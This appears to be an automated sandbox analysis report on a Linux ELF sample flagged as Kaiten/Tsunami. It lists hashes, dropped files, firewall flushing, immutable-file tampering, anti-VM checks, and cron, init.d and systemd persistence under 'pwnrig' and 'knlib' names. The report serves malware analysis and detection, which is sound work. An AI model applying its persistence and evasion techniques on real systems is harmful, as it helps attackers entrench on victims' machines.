Analysis
-
max time kernel
147s -
max time network
154s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
14-03-2024 04:01
Behavioral task
behavioral1
Sample
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf
-
Size
7.0MB
-
MD5
c91421f0d68095890b50a034dbf9d060
-
SHA1
624e0d9c94309de8d038b2e21cf07685d2020fdb
-
SHA256
2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b
-
SHA512
63d174cf0ba590aa836a9c4490ef7982d7590d8fcf9f67b8a8021dc23755a4aecf16805a12679e566d6d6bec45a4d3344d62197a7f3c6660c46812594888bd88
-
SSDEEP
49152:FdvgYnvuqgrb/TGvO90dL3BmAFd4A64nsfJYgJi1QjpzkpDKzBzQgQHDSZ/+/A5X:YqpgxDFnEqZJvlNiPt9y7LxXk5prrT
Malware Config
Signatures
-
Detects Kaiten/Tsunami Payload 8 IoCs
resource yara_rule behavioral1/memory/1970-1-0x00007fdb88d03000-0x00007fdb88d17700-memory.dmp family_kaiten2 behavioral1/memory/2717-5-0x00007f1fc5278000-0x00007f1fc528c700-memory.dmp family_kaiten2 behavioral1/memory/3293-8-0x00007f3433f2b000-0x00007f3433f3f700-memory.dmp family_kaiten2 behavioral1/memory/3775-11-0x00007ff04cd37000-0x00007ff04cd4b700-memory.dmp family_kaiten2 behavioral1/memory/4218-14-0x00007eff9ee0d000-0x00007eff9ee21700-memory.dmp family_kaiten2 behavioral1/memory/4659-17-0x00007f3ca4a6d000-0x00007f3ca4a81700-memory.dmp family_kaiten2 behavioral1/memory/5112-20-0x00007f0d79fab000-0x00007f0d79fbf700-memory.dmp family_kaiten2 behavioral1/memory/5563-23-0x00007f25ac114000-0x00007f25ac128700-memory.dmp family_kaiten2 -
Detects Kaiten/Tsunami payload 8 IoCs
resource yara_rule behavioral1/memory/1970-1-0x00007fdb88d03000-0x00007fdb88d17700-memory.dmp family_kaiten behavioral1/memory/2717-5-0x00007f1fc5278000-0x00007f1fc528c700-memory.dmp family_kaiten behavioral1/memory/3293-8-0x00007f3433f2b000-0x00007f3433f3f700-memory.dmp family_kaiten behavioral1/memory/3775-11-0x00007ff04cd37000-0x00007ff04cd4b700-memory.dmp family_kaiten behavioral1/memory/4218-14-0x00007eff9ee0d000-0x00007eff9ee21700-memory.dmp family_kaiten behavioral1/memory/4659-17-0x00007f3ca4a6d000-0x00007f3ca4a81700-memory.dmp family_kaiten behavioral1/memory/5112-20-0x00007f0d79fab000-0x00007f0d79fbf700-memory.dmp family_kaiten behavioral1/memory/5563-23-0x00007f25ac114000-0x00007f25ac128700-memory.dmp family_kaiten -
Executes dropped EXE 27 IoCs
ioc pid Process /etc/init.d/knlib 1709 knlib /tmp/sys-helper 1970 sys-helper /tmp/service-agent 1972 service-agent /tmp/service-agent 2438 service-agent /var/tmp/.klibsystem5-x 2517 .klibsystem5-x /tmp/sys-helper 2717 sys-helper /tmp/service-agent 2718 service-agent /tmp/service-agent 3127 service-agent /tmp/sys-helper 3293 sys-helper /tmp/service-agent 3294 service-agent /tmp/service-agent 3670 service-agent /tmp/sys-helper 3775 sys-helper /tmp/service-agent 3776 service-agent /tmp/service-agent 4121 service-agent /tmp/sys-helper 4218 sys-helper /tmp/service-agent 4219 service-agent /tmp/service-agent 4560 service-agent /tmp/sys-helper 4659 Process not Found /tmp/service-agent 4660 Process not Found /tmp/service-agent 5009 Process not Found /var/tmp/.klibsystem5-x 5091 Process not Found /tmp/sys-helper 5112 Process not Found /tmp/service-agent 5113 Process not Found /tmp/service-agent 5458 Process not Found /tmp/sys-helper 5563 Process not Found /tmp/service-agent 5564 Process not Found /tmp/service-agent 5907 Process not Found -
Flushes firewall rules 64 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 2573 iptables 2649 ip6tables 2528 iptables 2557 iptables 2558 iptables 2599 iptables 2632 ip6tables 2634 ip6tables 2522 iptables 2590 iptables 2598 iptables 2604 iptables 2606 ip6tables 2608 ip6tables 2630 ip6tables 1690 iptables 2542 iptables 2548 iptables 2642 ip6tables 2646 ip6tables 4279 update-rc.d 2589 iptables 2594 iptables 2596 iptables 2637 ip6tables 2670 ip6tables 2689 iptables 2578 iptables 2643 ip6tables 2687 iptables 2571 iptables 2586 iptables 2603 iptables 2539 iptables 2549 iptables 2564 iptables 2656 ip6tables 2660 ip6tables 2671 ip6tables 2680 ip6tables 2685 ip6tables 2524 ip6tables 2569 iptables 2651 ip6tables 2657 ip6tables 2674 ip6tables 2679 ip6tables 2552 iptables 2559 iptables 2597 iptables 2628 ip6tables 2682 ip6tables 2032 update-rc.d 2570 iptables 2615 ip6tables 2635 ip6tables 2650 ip6tables 2575 iptables 2583 iptables 2629 ip6tables 2607 ip6tables 2622 ip6tables 2683 ip6tables 2546 iptables -
ioc pid Process /usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1496 modprobe -
Reads EFI boot settings 64 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 Process not Found -
resource yara_rule behavioral1/files/fstream-6.dat upx behavioral1/files/fstream-15.dat upx behavioral1/files/fstream-18.dat upx behavioral1/files/fstream-38.dat upx behavioral1/files/fstream-93.dat upx behavioral1/files/fstream-102.dat upx behavioral1/files/fstream-134.dat upx behavioral1/files/fstream-191.dat upx behavioral1/files/fstream-193.dat upx -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 2776 chattr 4645 Process not Found 2641 ip6tables 2786 chattr 3694 sh 4646 Process not Found 5036 Process not Found 1964 chattr 2771 sed 3501 chattr 3761 chattr 3771 chattr 3823 chattr 5765 Process not Found 5106 Process not Found 1966 chattr 2560 iptables 2618 ip6tables 2708 chattr 3347 chattr 3697 hostname 4263 sed 2711 chattr 2986 sed 3287 chattr 3773 chattr 5257 Process not Found 2616 ip6tables 3154 hostname 3288 chattr 3357 chattr 3506 sed 3777 sh 5111 Process not Found 5565 Process not Found 5606 Process not Found 2712 chattr 3762 chattr 4658 Process not Found 5552 Process not Found 2719 sh 3277 chattr 4656 Process not Found 2783 chattr 3767 chattr 2647 ip6tables 3815 sh 3832 chattr 3984 sed 5561 Process not Found 2563 iptables 2678 ip6tables 3285 chattr 2523 ufw-init 2766 sh 3282 chattr 4650 Process not Found 5157 Process not Found 1708 chattr 2614 ip6tables 5117 Process not Found 2537 iptables 2974 chattr 4657 Process not Found -
Checks CPU configuration 1 TTPs 48 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo service-agent File opened for reading /proc/cpuinfo grep File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found File opened for reading /proc/cpuinfo Process not Found -
Checks hardware identifiers (DMI) 1 TTPs 64 IoCs
Checks DMI information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/bios_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name service-agent File opened for reading /sys/devices/virtual/dmi/id/product_name Process not Found File opened for reading /sys/devices/virtual/dmi/id/sys_vendor Process not Found File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent File opened for reading /sys/devices/virtual/dmi/id/board_vendor service-agent -
Creates/modifies Cron job 1 TTPs 64 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/cron.weekly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.weekly/sedWvUeOE sed File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.d/sedVy2a5j sed File opened for modification /var/spool/cron/crontabs/tmp.ZoQVGA Process not Found File opened for modification /etc/cron.d/sedeNmQ0P sed File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.weekly/sedHUNEct sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.d/sedBh8t8F sed File opened for modification /etc/cron.daily/seddij4ND sed File opened for modification /etc/cron.daily/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.d/pwnrig Process not Found File opened for modification /etc/cron.hourly/pwnrig Process not Found File opened for modification /etc/cron.daily/sedugTM9R Process not Found File opened for modification /etc/cron.hourly/sedqRpoeS Process not Found File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.daily/sed6sPjnt sed File opened for modification /etc/cron.hourly/sedbiBWih sed File opened for modification /etc/cron.d/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/.lib-knlib4 Process not Found File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.weekly/sedfrQZil sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /var/spool/cron/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /var/spool/cron/crontabs/tmp.oyCIGu crontab File opened for modification /etc/cron.hourly/.lib-knlib4 Process not Found File opened for modification /var/spool/cron/crontabs/tmp.PHbpeu crontab File opened for modification /etc/cron.hourly/sedz4LVMN sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.monthly/sed2OIj0o sed File opened for modification /etc/cron.weekly/seddF1son sed File opened for modification /etc/cron.hourly/pwnrig tee File opened for modification /etc/cron.weekly/sedjbrr6P sed File opened for modification /etc/cron.weekly/sedaOQuNU Process not Found File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /etc/cron.hourly/sedqisz7u sed File opened for modification /etc/cron.monthly/sedT2eATk sed File opened for modification /etc/cron.monthly/pwnrig Process not Found File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.hourly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.weekly/pwnrig Process not Found File opened for modification /etc/cron.d/sedM3q6ZR Process not Found File opened for modification /var/spool/cron/.lib-knlib4 Process not Found File opened for modification /etc/cron.d/sedPqG8nn sed File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.weekly/pwnrig tee File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.daily/sedLX7Fwk sed File opened for modification /etc/cron.d/sedgFFhYu sed File opened for modification /etc/cron.monthly/.lib-knlib4 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/cron.monthly/sedfsfpYR Process not Found File opened for modification /etc/cron.monthly/sed6gPirE sed File opened for modification /etc/cron.daily/.lib-knlib4 Process not Found File opened for modification /etc/cron.daily/sedP5MyVo sed File opened for modification /etc/cron.d/pwnrig tee File opened for modification /etc/cron.daily/pwnrig tee File opened for modification /etc/cron.hourly/sedj6DrBF sed File opened for modification /etc/cron.monthly/pwnrig tee File opened for modification /var/spool/cron/crontabs/tmp.8z5fD4 crontab File opened for modification /var/spool/cron/crontabs/tmp.sL8oco Process not Found -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/sedtZvsHf sed File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedCPZiVG Process not Found File opened for modification /etc/init.d/sedq6T63M Process not Found File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedk9hnbs sed File opened for modification /etc/init.d/sedHrHxkE sed File opened for modification /etc/init.d/pwnrig Process not Found File opened for modification /etc/init.d/knlib 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/pwnrig tee File opened for modification /etc/init.d/sedIKbJY4 sed File opened for modification /etc/init.d/pwnrig Process not Found -
Modifies systemd 1 TTPs 15 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/knlibe.service 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /etc/systemd/system/pwnrige.service Process not Found File opened for modification /etc/systemd/system/pwnrige.service tee File opened for modification /lib/systemd/system/pwnrigl.service tee File opened for modification /lib/systemd/system/pwnrigl.service Process not Found File opened for modification /lib/systemd/system/pwnrigl.service Process not Found -
Reads CPU attributes 1 TTPs 64 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/possible Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pgrep File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/possible service-agent File opened for reading /sys/devices/system/cpu/types service-agent File opened for reading /sys/devices/system/cpu/online service-agent File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/online Process not Found File opened for reading /sys/devices/system/cpu/types Process not Found File opened for reading /sys/devices/system/cpu/online pkill -
Reads hardware information 1 TTPs 64 IoCs
Accesses system info like serial numbers, manufacturer names etc.
